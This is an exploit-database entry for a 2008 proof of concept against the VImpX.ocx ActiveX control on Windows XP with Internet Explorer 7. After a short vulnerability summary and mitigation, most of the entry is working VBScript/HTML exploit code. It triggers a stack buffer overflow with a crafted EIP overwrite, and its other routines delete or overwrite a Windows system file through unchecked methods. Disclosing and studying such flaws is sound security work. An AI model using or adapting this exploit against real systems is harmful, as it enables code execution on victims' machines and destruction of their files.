db Software Laboratory VImpX (VImpX.ocx) Multiple vulnerabilities

vendor:

VImpX

by:

shinnai

8.8

CVSS

HIGH

Buffer Overflow, File Content Deletion, File Content Overwrite

119, 20, 78

CWE

Product Name: VImpX

Affected Version From: 4.8.8.0

Affected Version To: 4.8.8.0

Patch Exists: YES

Related CWE: N/A

CPE: a:db_software_laboratory:vimpx

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP

2009

db Software Laboratory VImpX (VImpX.ocx) Multiple vulnerabilities

db Software Laboratory VImpX (VImpX.ocx) is vulnerable to buffer overflow, file content deletion and file content overwrite. Passing an overly long string (more than 256 bytes) to the LogFile property will lead to a stack based buffer overflow which allows arbitrary code execution. The LogFile() and SaveToFile() methods do not check user supplied arguments, allowing an attacker to delete or overwrite the content of a file. This vulnerability was tested on Windows XP Professional SP3 with Internet Explorer 7.

Mitigation:

Ensure that user supplied arguments are properly validated and sanitized before being used. Update to the latest version of VImpX.ocx.

Source

Exploit-DB raw data:

-----------------------------------------------------------------------------
 db Software Laboratory VImpX (VImpX.ocx) Multiple vulnerabilities
 url: http://www.dbsoftlab.com/

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://www.shinnai.net
 
 Info:
 File:		VImpX.ocx v. 4.8.8.0
 CLSID:		{7600707B-9F47-416D-8AB5-6FD96EA37968}
 ProgID:	VImpX.VImpAX
 Description:	VImpAX Control
 
 Marked as:
  RegKey Safe for Script: False
  RegKey Safe for Init: False
  Implements IObjectSafety: True
  IDisp Safe: Safe for untrusted: caller,data  
  IPStorage Safe: Safe for untrusted: caller,data
 
 Vulnerbale method:
 Property Let LogFile As String
 Sub ClearLogFile
 Sub SaveToFile (ByVal FileName As String)

 Bug(s):
 #1 Passing an overly long string (more than 256 bytes), will lead into
    a stack based buffer overflow which allows arbitrary code execution
  
 #2 The "LogFile()" method doesn't check user supplied arguments so we can
    use it to store the file name we want to clear and then the
    "ClearLogFile()" to delete the content of the file

 #3 The "SaveToFile()" method doesn't check user supplied arguments so we
    can use it to overwrite the content of the file name passed as
    argument.

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.

 Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<object classid='clsid:7600707B-9F47-416D-8AB5-6FD96EA37968' id='test' width='20' height='20'></object>

<input language=VBScript onclick=bof() type=button value='Click here to start the Remote Buffer Overflow test' style="width: 361px; height: 24px" size=21>

<input language=VBScript onclick=afd() type=button value='Click here to start the File Content Deletion test' style="width: 361px; height: 24px" size=21>

<input language=VBScript onclick=afc() type=button value='Click here to start the File Content Corruption test' style="width: 361px; height: 24px" size=21>


<script language='vbscript'>
 Sub bof
  buff = String(256,"A") 
  EDI  = unescape("BBBB") 
  ESI  = unescape("CCCC")
  EBX  = unescape("DDDD") 
  EIP  = unescape("%C6%91%3A%7E") 'unescape("EEEE") 
  buf2 = unescape("FFFFFFFFFFFFFFFFFFFF") 
  memo = unescape("%00%00%01%00") 
  rest = unescape("GGGG") + String(2000, "H")
  egg = buff + EDI + ESI + EBX + EIP + buf2 + memo + rest
  test.LogFile = egg
 End Sub

 Sub afd
  test.LogFile = "C:\WINDOWS\_system.ini"
  test.ClearLogFile
  MsgBox "Exploit completed..."
 End Sub

 Sub afc
  test.SaveToFile "C:\WINDOWS\_system.ini"
  MsgBox "Exploit completed..."
 End Sub
</script>

# milw0rm.com [2008-10-24]